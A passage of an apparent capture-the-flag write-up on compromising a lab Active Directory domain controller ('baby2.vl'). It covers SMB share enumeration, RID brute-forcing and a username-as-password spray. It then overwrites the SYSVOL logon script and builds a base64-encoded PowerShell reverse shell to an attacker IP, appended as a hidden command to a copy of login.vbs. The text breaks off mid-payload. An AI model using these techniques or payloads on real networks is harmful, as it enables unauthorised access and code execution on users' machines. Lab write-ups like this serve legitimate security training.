Windows RPC -Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port -Device type: general purpose -Running (JUST GUESSING): Microsoft Windows 2022|10|11|2012|2016 (89%) -OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 -Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows 10 1703 or Windows 11 21H2 - 23H2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%) -No exact OS matches for host (test conditions non-ideal). -Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows - -Host script results: -| smb2-security-mode:   -|   3.1.1:   -|_    Message signing enabled and required -| smb2-time:   -|   date: 2026-06-05T14:05:32 -|_  start_date: N/A - -OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . -Nmap done: 1 IP address (1 host up) scanned in 270.04 seconds -``` - -Active Directory box with `DNS:dc.baby2.vl, DNS:baby2.vl` that we'll add to our hosts with ports `389/tcp & 3268/tcp` (LDAP Active Directory), `445/tcp` (smb 3.1.1) `139/tcp` NetBIOS, -`135/tcp` RPC `88/tcp` (Kerberos) and `53/tcp` (DNS) with a `ms-wbt-server` on `3389/tcp`. - -```bash ->  echo "10.129.13.186 babytwo.htb baby2.htb dc.baby2.vl baby2.vl" | sudo tee -a /etc/hosts -Please touch the FIDO authenticator. -10.129.13.186 babytwo.htb baby2.htb dc.baby2.vl baby2.vl -``` - -We'll start by enumerating shares as guest on SMB : - -```bash ->  nxc smb10.129.13.186 -u guest -p '' --shares -SMB        10.129.13.186  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:None) (Null Auth:True) -SMB        10.129.13.186   445    DC               [+] baby2.vl\guest:   -SMB        10.129.13.186   445    DC               [*] Enumerated shares -SMB        10.129.13.186   445    DC               Share           Permissions     Remark -SMB        10.129.13.186   445    DC               -----           -----------     ------ -SMB        10.129.13.186   445    DC               ADMIN$                          Remote Admin -SMB        10.129.13.186   445    DC               apps            READ              -SMB        10.129.13.186   445    DC               C$                              Default share -SMB        10.129.13.186   445    DC               docs                              -SMB        10.129.13.186   445    DC               homes           READ,WRITE        -SMB        10.129.13.186   445    DC               IPC$            READ            Remote IPC -SMB        10.129.13.186   445    DC               NETLOGON        READ            Logon server share   -SMB        10.129.13.186   445    DC               SYSVOL                          Logon server share -``` - -We have a `READ,WRITE` on `homes` and a `READ` on `NETLOGON` and `apps`. - -```bash ->  smbclient //10.129.13.186/homes -U guest% -Try "help" to get a list of possible commands. -smb: \> ls - .                                   D        0  Fri Jun  5 16:12:45 2026 - ..                                  D        0  Tue Aug 22 22:10:21 2023 - Amelia.Griffiths                    D        0  Tue Aug 22 22:17:06 2023 - Carl.Moore                          D        0  Tue Aug 22 22:17:06 2023 - Harry.Shaw                          D        0  Tue Aug 22 22:17:06 2023 - Joan.Jennings                       D        0  Tue Aug 22 22:17:06 2023 - Joel.Hurst                          D        0  Tue Aug 22 22:17:06 2023 - Kieran.Mitchell                     D        0  Tue Aug 22 22:17:06 2023 - library                             D        0  Tue Aug 22 22:22:47 2023 - Lynda.Bailey                        D        0  Tue Aug 22 22:17:06 2023 - Mohammed.Harris                     D        0  Tue Aug 22 22:17:06 2023 - Nicola.Lamb                         D        0  Tue Aug 22 22:17:06 2023 - Ryan.Jenkins                        D        0  Tue Aug 22 22:17:06 2023 - -               6126847 blocks of size 4096. 1277089 blocks available -``` - -So we already got a lot of users. - -We'll spider_plus the files inside of the smb directory because that's a lot and build a users list. - -```bash ->  nxc smb dc.baby2.vl -u 'guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=True -SMB        10.129.13.186   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:None) (Null Auth:True) -SMB        10.129.13.186   445    DC               [+] baby2.vl\guest:   -SPIDER_PLUS10.129.13.186   445    DC               [*] Started module spidering_plus with the following options: -SPIDER_PLUS10.129.13.186   445    DC               [*]  DOWNLOAD_FLAG: True -SPIDER_PLUS10.129.13.186   445    DC               [*]     STATS_FLAG: True -SPIDER_PLUS10.129.13.186   445    DC               [*] EXCLUDE_FILTER: ['print$', 'ipc$'] -SPIDER_PLUS10.129.13.186   445    DC               [*]   EXCLUDE_EXTS: ['ico', 'lnk'] -SPIDER_PLUS10.129.13.186   445    DC               [*]  MAX_FILE_SIZE: 50 KB -SPIDER_PLUS10.129.13.186   445    DC               [*]  OUTPUT_FOLDER: /home/vagabond/.nxc/modules/nxc_spider_plus -SMB        10.129.13.186   445    DC               [*] Enumerated shares -SMB        10.129.13.186   445    DC               Share           Permissions     Remark -SMB        10.129.13.186   445    DC               -----           -----------     ------ -SMB        10.129.13.186   445    DC               ADMIN$                          Remote Admin -SMB        10.129.13.186   445    DC               apps            READ              -SMB        10.129.13.186   445    DC               C$                              Default share -SMB        10.129.13.186   445    DC               docs                              -SMB        10.129.13.186   445    DC               homes           READ,WRITE        -SMB        10.129.13.186   445    DC               IPC$            READ            Remote IPC -SMB        10.129.13.186   445    DC               NETLOGON        READ            Logon server share   -SMB        10.129.13.186   445    DC               SYSVOL                          Logon server share   -SPIDER_PLUS10.129.13.186   445    DC               [+] Saved share-file metadata to "/home/vagabond/.nxc/modules/nxc_spider_plus/10.129.13.186.json". -SPIDER_PLUS10.129.13.186   445    DC               [*] SMB Shares:           8 (ADMIN$, apps, C$, docs, homes, IPC$, NETLOGON, SYSVOL) -SPIDER_PLUS10.129.13.186   445    DC               [*] SMB Readable Shares:  4 (apps, homes, IPC$, NETLOGON) -SPIDER_PLUS10.129.13.186   445    DC               [*] SMB Writable Shares:  1 (homes) -SPIDER_PLUS10.129.13.186   445    DC               [*] SMB Filtered Shares:  1 -SPIDER_PLUS10.129.13.186   445    DC               [*] Total folders found:  12 -SPIDER_PLUS10.129.13.186   445    DC               [*] Total files found:    3 -SPIDER_PLUS10.129.13.186   445    DC               [*] Files filtered:       1 -SPIDER_PLUS10.129.13.186   445    DC               [*] File size average:    966.67 B -SPIDER_PLUS10.129.13.186   445    DC               [*] File size min:        108 B -SPIDER_PLUS10.129.13.186   445    DC               [*] File size max:        1.76 KB -SPIDER_PLUS10.129.13.186   445    DC               [*] File unique exts:     2 (vbs, lnk) -SPIDER_PLUS10.129.13.186   445    DC               [*] Downloads successful: 2 -SPIDER_PLUS10.129.13.186   445    DC               [+] All files processed successfully. -``` - -Only two downloaded files we'll check quickly for anything interesting : - -```bash - rg -i 'password|passwd|pwd|secret|User Id|connectionstring|BEGIN OPENSSH|\.rdp|gpp|Groups\.xml|cpassword|auto.?logon|DefaultPassword' /home/vagabond/.nxc/modules/nxc_spider_plus/10.129.13.186.json | head -40 - ->  rg -i '\.(txt|xml|ini|config|bat|ps1|sql|json|yml|yaml|rdp|kdbx)$' /home/vagabond/.nxc/modules/nxc_spider_plus/10.129.13.186.json | head -40 -``` - -And we got nothing, so we'll proceed with exploring the SMB shares and creating the users list : - -```bash ->  sudo nano users.txt ->  cat users.txt -Amelia.Griffiths -Carl.Moore -Harry.Shaw    -Joan.Jennings -Joel.Hurst -Kieran.Mitchell -Lynda.Bailey -Mohammed.Harris -Nicola.Lamb -Ryan.Jenkins -``` - -Then we'll explore the SMB shares : - -```bash ->  smbclient //10.129.13.186/apps -U guest% -Try "help" to get a list of possible commands. -smb: \> ls - .                                   D        0  Thu Sep  7 21:12:59 2023 - ..                                  D        0  Tue Aug 22 22:10:21 2023 - dev                                 D        0  Thu Sep  7 21:13:50 2023 - -               6126847 blocks of size 4096. 1960306 blocks available -smb: \> cd dev -smb: \dev\> ls - .                                   D        0  Thu Sep  7 21:13:50 2023 - ..                                  D        0  Thu Sep  7 21:12:59 2023 - CHANGELOG                           A      108  Thu Sep  7 21:16:15 2023 - login.vbs.lnk                       A     1800  Thu Sep  7 21:13:23 2023 - -               6126847 blocks of size 4096. 1960306 blocks available -smb: \dev\> get CHANGELOG -getting file \dev\CHANGELOG of size 108 as CHANGELOG (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec) -smb: \dev\> get login.vbs.lnk -getting file \dev\login.vbs.lnk of size 1800 as login.vbs.lnk (4.9 KiloBytes/sec) (average 2.9 KiloBytes/sec) -``` - -```bash ->  cat CHANGELOG -[0.2] - -- Added automated drive mapping - -[0.1] - -- Rolled out initial version of the domain logon script% -``` - -And we need to decrypt `login.vbs.lnk` to get something out of it. - -```bash ->  /home/vagabond/.local/bin/lnkparse login.vbs.lnk -Windows Shortcut Information: -  Guid: 00021401-0000-0000-C000-000000000046 -  Link flags: HasTargetIDList | HasLinkInfo | HasRelativePath | HasWorkingDir | IsUnicode | EnableTargetMetadata - (524443) -  File flags: FILE_ATTRIBUTE_ARCHIVE - (32) -  Creation time: 2023-08-22 19:28:18.552829+00:00 -  Accessed time: 2023-09-02 14:55:51.994608+00:00 -  Modified time: 2023-09-02 14:55:51.994608+00:00 -  File size: 992 -  Icon index: 0 -  Windowstyle: SW_SHOWNORMAL -  Hotkey: UNSET - UNSET {0x0000} - -  SIZE: 1800 - -  TARGET: -     Items: -     -  Root Folder: -           Sort index: My Computer -           Sort index value: 80 -           Guid: 20D04FE0-3AEA-1069-A2D8-08002B30309D -     -  Volume Item: -           Flags: '0xf' -           Volume name: C:\ -     -  File entry: -           Flags: Is directory -           File size: 0 -           File attribute flags: 16 -           Primary name: Windows -     -  File entry: -           Flags: Is directory -           File size: 0 -           File attribute flags: 16 -           Primary name: SYSVOL -     -  File entry: -           Flags: Is directory -           File size: 0 -           File attribute flags: 16 -           Primary name: sysvol -     -  File entry: -           Flags: Is directory -           File size: 0 -           File attribute flags: 1040 -           Primary name: baby2.vl -     -  File entry: -           Flags: Is directory -           File size: 0 -           File attribute flags: 16 -           Primary name: scripts -     -  File entry: -           Flags: Is file -           File size: 992 -           File attribute flags: 32 -           Primary name: login.vbs - -  LINK INFO: -     Link info flags: 3 -     Local base path: C:\Windows\SYSVOL\sysvol\baby2.vl\scripts\ -     Common path suffix: login.vbs -     Location info: -        Drive type: DRIVE_FIXED -        Drive serial number: '0xe6f32485' -        Volume label: '' -     Location: Local - -  DATA: -     Relative path: ..\..\..\Windows\SYSVOL\sysvol\baby2.vl\scripts\login.vbs -     Working directory: C:\Windows\SYSVOL\sysvol\baby2.vl\scripts - -  EXTRA: -     SPECIAL FOLDER LOCATION BLOCK: -        Size: 16 -        Special folder id: 36 -        Offset: 131 -     KNOWN FOLDER LOCATION BLOCK: -        Size: 28 -        Known folder id: F38BF404-1D43-42F2-9305-67DE0B28FC23 -        Offset: 131 -     DISTRIBUTED LINK TRACKER BLOCK: -        Size: 96 -        Length: 88 -        Version: 0 -        Machine identifier: dc -        Droid volume identifier: F73129F6-BEED-429A-88BA-9573971C9D61 -        Droid file identifier: A6644D7E-411F-11EE-B012-000C29AF9E25 -        Birth droid volume identifier: F73129F6-BEED-429A-88BA-9573971C9D61 -        Birth droid file identifier: A6644D7E-411F-11EE-B012-000C29AF9E25 -     METADATA PROPERTIES BLOCK: -        Size: 677 -        Property store: -        -  Storage size: 133 -           Version: '0x53505331' -           Format id: DABD30ED-0043-4789-A7F8-D013A4736622 -           Serialized property values: -           -  Value size: 105 -              Id: 100 -              Value: scripts (C:\Windows\SYSVOL\sysvol\baby2.vl) -              Value type: VT_LPWSTR -        -  Storage size: 137 -           Version: '0x53505331' -           Format id: 46588AE2-4CBC-4338-BBFC-139326986DCE -           Serialized property values: -           -  Value size: 109 -              Id: 4 -              Value: S-1-5-21-213243958-1766259620-4276976267-500 -              Value type: VT_LPWSTR -        -  Storage size: 189 -           Version: '0x53505331' -           Format id: B725F130-47EF-101A-A5F1-02608C9EEBAC -           Serialized property values: -           -  Value size: 37 -              Id: 10 -              Value: login.vbs -              Value type: VT_LPWSTR -           -  Value size: 21 -              Id: 15 -              Value: null -              Value type: VT_FILETIME -           -  Value size: 21 -              Id: 12 -              Value: null -              Value type: VT_UI8 -           -  Value size: 61 -              Id: 4 -              Value: VBScript Script File -              Value type: VT_LPWSTR -           -  Value size: 21 -              Id: 14 -              Value: null -              Value type: VT_FILETIME -        -  Storage size: 149 -           Version: '0x53505331' -           Format id: 28636AA6-953D-11D2-B5D6-00C04FD918D0 -           Serialized property values: -           -  Value size: 121 -              Id: 30 -              Value: C:\Windows\SYSVOL\sysvol\baby2.vl\scripts\login.vbs -              Value type: VT_LPWSTR -        -  Storage size: 57 -           Version: '0x53505331' -           Format id: 446D16B1-8DAD-4870-A748-402EA43D788C -           Serialized property values: -           -  Value size: 29 -              Id: 104 -              Value: null -              Value type: VT_CLSID -``` - -So we got a shortcut for `C:\Windows\SYSVOL\sysvol\baby2.vl\scripts\login.vbs` which we might have access to : - -```bash ->  smbclient //10.129.13.186/SYSVOL -U guest% -smb: \> cd /baby2.vl -cd \baby2.vl\: NT_STATUS_ACCESS_DENIED -``` - -And it seems the path is denied as guest. - -So we'll do a spray see if we get a `user:user` as correct login : - -```bash ->  nxc smb dc.baby2.vl -u users.txt -p users.txt --no-bruteforce --continue-on-success - -SMB        10.129.13.186   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:None) (Null Auth:True) -SMB        10.129.13.186   445    DC               [-] baby2.vl\Amelia.Griffiths:Amelia.Griffiths STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Harry.Shaw:Harry.Shaw STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Joan.Jennings:Joan.Jennings STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Joel.Hurst:Joel.Hurst STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Kieran.Mitchell:Kieran.Mitchell STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Lynda.Bailey:Lynda.Bailey STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Mohammed.Harris:Mohammed.Harris STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Nicola.Lamb:Nicola.Lamb STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Ryan.Jenkins:Ryan.Jenkins STATUS_LOGON_FAILURE -``` - -And we got it, `[+] baby2.vl\Carl.Moore:Carl.Moore`. - -So we'll try `nxc winrm` and `nxc smb` on it and try to access the SYSVOL login `\baby2.vl\scripts\login.vbs` with this user. - -```bash ->  nxc winrm10.129.13.186 -u Carl.Moore -p 'Carl.Moore' -WINRM      10.129.13.186   5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:baby2.vl)   -WINRM      10.129.13.186   5985   DC               [-] baby2.vl\Carl.Moore:Carl.Moore - ->  nxc smb10.129.13.186 -u Carl.Moore -p 'Carl.Moore' --shares -SMB        10.129.13.186   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:None) (Null Auth:True) -SMB        10.129.13.186   445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore   -SMB        10.129.13.186   445    DC               [*] Enumerated shares -SMB        10.129.13.186   445    DC               Share           Permissions     Remark -SMB        10.129.13.186   445    DC               -----           -----------     ------ -SMB        10.129.13.186   445    DC               ADMIN$                          Remote Admin -SMB        10.129.13.186   445    DC               apps            READ,WRITE        -SMB        10.129.13.186   445    DC               C$                              Default share -SMB        10.129.13.186   445    DC               docs            READ,WRITE        -SMB        10.129.13.186   445    DC               homes           READ,WRITE        -SMB        10.129.13.186   445    DC               IPC$            READ            Remote IPC -SMB        10.129.13.186   445    DC               NETLOGON        READ            Logon server share   -SMB        10.129.13.186   445    DC               SYSVOL          READ            Logon server share -``` - -So this time we have `READ,WRITE` on `apps` and `docs` as well as `READ` on SYSVOL which makes me think we can get to that shortcut we found earlier. - -```bash ->  smbclient //10.129.13.186/SYSVOL -U Carl.Moore%Carl.Moore -Try "help" to get a list of possible commands. -smb: \> ls - .                                   D        0  Tue Aug 22 19:37:36 2023 - ..                                  D        0  Tue Aug 22 19:37:36 2023 - baby2.vl                           Dr        0  Tue Aug 22 19:37:36 2023 - -               6126847 blocks of size 4096. 1960110 blocks available -smb: \> cd baby2.vl/scripts -smb: \baby2.vl\scripts\> ls - .                                   D        0  Mon Aug 25 10:30:39 2025 - ..                                  D        0  Tue Aug 22 19:43:55 2023 - login.vbs                           A      992  Sat Sep  2 16:55:51 2023 - -               6126847 blocks of size 4096. 1960110 blocks available -smb: \baby2.vl\scripts\> get login.vbs -getting file \baby2.vl\scripts\login.vbs of size 992 as login.vbs (2.7 KiloBytes/sec) (average 2.7 KiloBytes/sec) -``` - -And we got `login.vbs`. No luck on `winrm`. - -```bash ->  cat login.vbs -Sub MapNetworkShare(sharePath, driveLetter) -   Dim objNetwork -   Set objNetwork = CreateObject("WScript.Network")      -   -    Check if the drive is already mapped -   Dim mappedDrives -   Set mappedDrives = objNetwork.EnumNetworkDrives -   Dim isMapped -   isMapped = False -   For i = 0 To mappedDrives.Count - 1 Step 2 -       If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then -           isMapped = True -           Exit For -       End If -   Next -     -   If isMapped Then -       objNetwork.RemoveNetworkDrive driveLetter & ":", True, True -   End If -     -   objNetwork.MapNetworkDrive driveLetter & ":", sharePath -     -   If Err.Number = 0 Then -       WScript.Echo "Mapped " & driveLetter & ": to " & sharePath -   Else -       WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description -   End If -     -   Set objNetwork = Nothing -End Sub - -MapNetworkShare "\\dc.baby2.vl\apps", "V" -MapNetworkShare "\\dc.baby2.vl\docs", "L"% - ->  smbclient //10.129.13.186/docs -U Carl.Moore%Carl.Moore -Try "help" to get a list of possible commands. -smb: \> ls - .                                   D        0  Fri Jun  5 16:47:16 2026 - ..                                  D        0  Tue Aug 22 22:10:21 2023 - -               6126847 blocks of size 4096. 1960047 blocks available -``` - -And that's all we seem to get. - -We'll try a new spray, this time with all the `SidTypeUsers` : - -``` ->  nxc smb dc.baby2.vl -u guest -p '' --rid-brute | rg SidTypeUser | cut -d'\' -f2 | cut -d' ' -f1 | sort -u | tee users-rid.txt ->  nxc smb dc.baby2.vl -u users-rid.txt -p users-rid.txt --no-bruteforce --continue-on-success - -SMB        10.129.13.186   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:None) (Null Auth:True) -SMB        10.129.13.186   445    DC               [-] baby2.vl\Administrator:Administrator STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Amelia.Griffiths:Amelia.Griffiths STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore   -SMB        10.129.13.186   445    DC               [-] baby2.vl\DC$:DC$ STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\gpoadm:gpoadm STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Guest:Guest STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Harry.Shaw:Harry.Shaw STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Joan.Jennings:Joan.Jennings STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Joel.Hurst:Joel.Hurst STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Kieran.Mitchell:Kieran.Mitchell STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\krbtgt:krbtgt STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [+] baby2.vl\library:library   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Lynda.Bailey:Lynda.Bailey STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Mohammed.Harris:Mohammed.Harris STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Nicola.Lamb:Nicola.Lamb STATUS_LOGON_FAILURE   -SMB        10.129.13.186   445    DC               [-] baby2.vl\Ryan.Jenkins:Ryan.Jenkins STATUS_LOGON_FAILURE -``` - -And we missed the second hit apparently : `library:library`. - -We'll run netexec on it as well : - -```bash ->  nxc smb10.129.13.186 -u library -p 'library' --shares -SMB        10.129.13.186   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:None) (Null Auth:True) -SMB        10.129.13.186   445    DC               [+] baby2.vl\library:library   -SMB        10.129.13.186   445    DC               [*] Enumerated shares -SMB        10.129.13.186   445    DC               Share           Permissions     Remark -SMB        10.129.13.186   445    DC               -----           -----------     ------ -SMB        10.129.13.186   445    DC               ADMIN$                          Remote Admin -SMB        10.129.13.186   445    DC               apps            READ,WRITE        -SMB        10.129.13.186   445    DC               C$                              Default share -SMB        10.129.13.186   445    DC               docs            READ,WRITE        -SMB        10.129.13.186   445    DC               homes           READ,WRITE        -SMB        10.129.13.186   445    DC               IPC$            READ            Remote IPC -SMB        10.129.13.186   445    DC               NETLOGON        READ            Logon server share   -SMB        10.129.13.186   445    DC               SYSVOL          READ            Logon server share   ->  nxc winrm10.129.13.186 -u library -p 'library' -WINRM      10.129.13.186   5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:baby2.vl)   -WINRM      10.129.13.186   5985   DC               [-] baby2.vl\library:library -``` - -And nothing new. - -We'll try to write a file into SYSVOL that pretends to be `login.vbs` : - -```bash ->  cp login.vbs login.vbs.bak -echo 'test write proof' > login-test.vbs -smbclient //10.129.13.186/SYSVOL -U 'Carl.Moore%Carl.Moore' -c 'cd baby2.vl/scripts; put login-test.vbs login.vbs; ls' - -putting file login-test.vbs as \baby2.vl\scripts\login.vbs (0.1 kB/s) (average 0.1 kB/s) - .                                   D        0  Mon Aug 25 10:30:39 2025 - ..                                  D        0  Tue Aug 22 19:43:55 2023 - login.vbs                           A       17  Fri Jun  5 17:07:03 2026 - -               6126847 blocks of size 4096. 1960951 blocks available -``` - -And it worked. - -Time to get `bloodhound` running so we can try to get to other users. - -```bash ->  bloodhound-python -d baby2.vl -c All -u library -p 'library' -ns10.129.13.186 --zip -INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) -INFO: Found AD domain: baby2.vl -INFO: Getting TGT for user -INFO: Connecting to LDAP server: dc.baby2.vl -INFO: Testing resolved hostname connectivity dead:beef::898b:764c:b388:b97e -INFO: Trying LDAP connection to dead:beef::898b:764c:b388:b97e -INFO: Testing resolved hostname connectivity dead:beef::19d -INFO: Trying LDAP connection to dead:beef::19d -INFO: Found 1 domains -INFO: Found 1 domains in the forest -INFO: Found 1 computers -INFO: Connecting to LDAP server: dc.baby2.vl -INFO: Testing resolved hostname connectivity dead:beef::898b:764c:b388:b97e -INFO: Trying LDAP connection to dead:beef::898b:764c:b388:b97e -INFO: Testing resolved hostname connectivity dead:beef::19d -INFO: Trying LDAP connection to dead:beef::19d -INFO: Found 16 users -INFO: Found 54 groups -INFO: Found 2 gpos -INFO: Found 3 ous -INFO: Found 19 containers -INFO: Found 0 trusts -INFO: Starting computer enumeration with 10 workers -INFO: Querying computer: dc.baby2.vl -INFO: Done in 00M 33S -INFO: Compressing output into 20260605171144_bloodhound.zip -``` - -We start `bloodhound` but it seems neither `library` nor `Carl.Moore` have any Outbound Object Control. - -We let bloodhound alone for now, and put back login.vbs where it was : - -```bash ->  smbclient //10.129.13.186/SYSVOL -U 'Carl.Moore%Carl.Moore' -c 'cd baby2.vl/scripts; put login.vbs.bak login.vbs; ls' - -putting file login.vbs.bak as \baby2.vl\scripts\login.vbs (6.1 kB/s) (average 6.1 kB/s) - .                                   D        0  Mon Aug 25 10:30:39 2025 - ..                                  D        0  Tue Aug 22 19:43:55 2023 - login.vbs                           A      992  Fri Jun  5 17:17:34 2026 - -               6126847 blocks of size 4096. 1958018 blocks available -``` - -So we create a payload to mimick `login.vbs` to get a shell : - -```bash ->  cat > /tmp/revshell.ps1 << 'EOF' -$client = New-Object System.Net.Sockets.TCPClient('10.10.14.228',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object --TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendbac -k2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() -EOF - -iconv -f ASCII -t UTF-16LE /tmp/revshell.ps1 | base64 -w0 -JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4AMgAyADgAJwAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQ -AgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABi -AHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAE -kASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsA -JABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQ -A6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBl -AGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAAoA% -``` - -```bash ->  cp login.vbs.bak payload.vbs -B64=$(iconv -f ASCII -t UTF-16LE /tmp/revshell.ps1 | base64 -w0) -printf '\nSet cmdshell = CreateObject("Wscript.Shell")\ncmdshell.Run "powershell -nop -w hidden -enc %s", 0, False\n' "$B64" >> payload.vbs ->  cat payload.vbs -Sub MapNetworkShare(sharePath, driveLetter) -   Dim objNetwork -   Set objNetwork = CreateObject("WScript.Network")      -   -   ' Check if the drive is already mapped -   Dim mappedDrives -   Set mappedDrives = objNetwork.EnumNetworkDrives -   Dim isMapped -   isMapped = False -   For i = 0 To mappedDrives.Count - 1 Step 2 -       If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then -           isMapped = True -           Exit For -       End If -   Next -     -   If isMapped Then -       objNetwork.RemoveNetworkDrive driveLetter & ":", True, True -   End If -     -   objNetwork.MapNetworkDrive driveLetter & ":", sharePath -     -   If Err.Number = 0 Then -       WScript.Echo "Mapped " & driveLetter & ": to " & sharePath -   Else -       WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description -   End If -     -   Set objNetwork = Nothing -End Sub - -MapNetworkShare "\\dc.baby2.vl\apps", "V" -MapNetworkShare "\\dc.baby2.vl\docs", "L" -Set cmdshell = CreateObject("Wscript.Shell") -cmdshell.Run "powershell -nop -w hidden -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4AMgAyA -DgAJwAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACA 